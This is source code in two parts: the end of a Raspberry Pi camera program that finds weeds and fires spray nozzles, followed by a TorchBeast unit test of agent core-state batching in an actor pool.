= imageOut.shape[1] / self.nozzleNum # calculate lane coords and draw on frame for i in range(self.nozzleNum): laneX = int(i * laneWidth) # cv2.line(displayFrame, (laneX, 0), (laneX, imageOut.shape[0]), (0, 255, 255), 2) self.laneCoords[i] = laneX # loop over the ID/weed centres from contours for ID, centre in enumerate(weedCentres): # if they are in activation region the spray them if centre[1] > self.yAct: sprayTime = time.time() for i in range(self.nozzleNum): # determine which lane needs to be activated if int(self.laneCoords[i]) <= centre[0] < int(self.laneCoords[i] + laneWidth): # log a spray job with the controller using the nozzle, delay, timestamp and spray duration # if GPS is used/speed control, delay can be updated automatically based on forward speed self.controller.receive(nozzle=i, delay=delay, timeStamp=sprayTime, duration=sprayDur) # update the framerate counter fps.update() if not self.headless: cv2.imshow("Output", imutils.resize(imageOut, width=600)) if self.record and not self.saveRecording: self.writer.write(frame) if self.saveRecording and not self.record: self.writer.release() self.controller.solenoid.beep(duration=0.1) self.recorderButton.saveRecording = False fps.stop() self.writer = None self.logger.log_line_video("[INFO] {}. Approximate FPS: {:.2f}".format(self.baseName, fps.fps()), verbose=True) fps = FPS().start() k = cv2.waitKey(1) & 0xFF if k == 27: fps.stop() self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True) self.stop() break except KeyboardInterrupt: fps.stop() self.logger.log_line_video("[INFO] Stopped. Approximate FPS: {:.2f}".format(fps.fps()), verbose=True) self.stop() except Exception as e: self.controller.solenoid.beep(duration=0.5, repeats=5) self.logger.log_line("[CRITICAL ERROR] STOPPED: {}".format(e)) # still in development def update_software(self): USBDir, USBConnected = check_for_usb() if USBConnected: files = os.listdir(USBDir) workingDir = '/home/pi' # move old version to version control directory first oldVersionDir = strftime(workingDir + "/%Y%m%d-%H%M%S_update") os.mkdir(oldVersionDir) currentDir = '/home/pi/owl' shutil.move(currentDir, oldVersionDir) # move new directory to working directory for item in files: if 'owl' in item: shutil.move() def stop(self): self.controller.running = False self.controller.solenoid.all_off() self.controller.solenoid.beep(duration=0.1) self.controller.solenoid.beep(duration=0.1) self.cam.stop() if self.record: self.writer.release() self.recorderButton.running = False if not self.headless: cv2.destroyAllWindows() sys.exit() def update(self, exgMin=30, exgMax=180): self.exgMin = exgMin self.exgMax = exgMax def update_delay(self, delay=0): # if GPS added, could use it here to return a delay variable based on speed. return delay def check_for_usb(): try: nanoMediaFolder = 'ls /media/pi' proc = subprocess.Popen(nanoMediaFolder, shell=True, preexec_fn=os.setsid, stdout=subprocess.PIPE) usbName = proc.stdout.readline().rstrip().decode('utf-8') if len(usbName) > 0: print('[INFO] Saving to {} usb'.format(usbName)) saveDir = '/media/pi/{}/'.format(usbName) return saveDir, True else: print('[INFO] No USB connected. Saving to videos') saveDir = '/home/pi/owl/videos' return saveDir, False except AttributeError: print('[INFO] Windows computer detected...') saveDir = '/videos/' return saveDir, False # business end of things if __name__ == "__main__": owl = Owl(video=False, videoFile=r'', headless=True, recording=False, exgMin=25, exgMax=200, hueMin=39, hueMax=83, saturationMin=50, saturationMax=220, brightnessMin=60, brightnessMax=190, framerate=32, resolution=(416, 320)) # start the targeting! owl.hoot(sprayDur=0.15, delay=0, sample=False, sampleDim=1000, saveDir='/home/pi', algorithm='exhsv', selectorEnabled=False, camera_name='hsv', minArea=10)
core_agent_state_test.py
# Copyright (c) Facebook, Inc. and its affiliates. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test that the core state is handled correctly by the batching mechanism.""" import unittest import threading import subprocess import torch from torch import nn from libtorchbeast import actorpool class Net(nn.Module): def __init__(self): super(Net, self).__init__() def initial_state(self): return torch.zeros(1, 1) def forward(self, inputs, core_state): x = inputs["frame"] notdone = (~inputs["done"]).float() T, B, *_ = x.shape for nd in notdone.unbind(): nd.view(1, -1) core_state = nd * core_state core_state = core_state + 1 # Arbitrarily return action 1. action = torch.ones((T, B), dtype=torch.int32) return (action,), core_state class CoreAgentStateTest(unittest.TestCase): def setUp(self): self.server_proc = subprocess.Popen(["python", "tests/core_agent_state_env.py"]) self.B = 2 self.T = 3 self.model = Net() server_address = ["unix:/tmp/core_agent_state_test"] self.learner_queue = actorpool.BatchingQueue( batch_dim=1, minimum_batch_size=self.B, maximum_batch_size=self.B, check_inputs=True, ) self.inference_batcher = actorpool.DynamicBatcher( batch_dim=1, minimum_batch_size=1, maximum_batch_size=1, timeout_ms=100, check_outputs=True, ) self.actor = actorpool.ActorPool( unroll_length=self.T, learner_queue=self.learner_queue, inference_batcher=self.inference_batcher, env_server_addresses=server_address, initial_agent_state=self.model.initial_state(), ) def inference(self): for batch in self.inference_batcher: batched_env_outputs, agent_state = batch.get_inputs() frame, _, done, *_ = batched_env_outputs # Check that when done is set we reset the environment. # Since we only have one actor producing experience we will always # have batch_size == 1, hence we can safely use item(). if done.item(): self.assertEqual(frame.item(), 0.0) outputs = self.model(dict(frame=frame, done=done), agent_state) batch.set_outputs(outputs) def learn(self): for i, tensors in enumerate(self.learner_queue): batch, initial_agent_state = tensors env_outputs, actor_outputs = batch frame, _, done, *_ = env_outputs # Make sure the last env_outputs of a rollout equals the first of the # following one. # This is guaranteed to be true if there is only one actor filling up # the learner queue. self.assertEqual(frame[self.T][0].item(), frame[0][1].item()) self.assertEqual(done[self.T][0].item(), done[0][1].item()) # Make sure the initial state equals the value of the frame at the beginning # of the rollout. This has to be the case in our test since: # - every call to forward increments the core state by one. # - every call to step increments the value in the frame by one (modulo 5). env_done_after = 5 # Matches self.done_after in core_agent_state_env.py. self.assertEqual( frame[0][0].item(), initial_agent_state[0][0].item() % env_done_after ) self.assertEqual( frame[0][1].item(), initial_agent_state[0][1].item() % env_done_after ) if i >= 10: # Stop execution. self.learner_queue.close() self.inference_batcher.close() def test_core_agent_state(self): def run(): self.actor.run() threads = [ threading.Thread(target=self.inference), threading.Thread(target=run), ] # Start actor and inference thread. for thread in threads: thread.start() self.learn() for thread in threads: thread.join() def tearDown(self): self.server_proc.terminate() self.server_proc.wait() if __name__ == "__main__": unittest.main()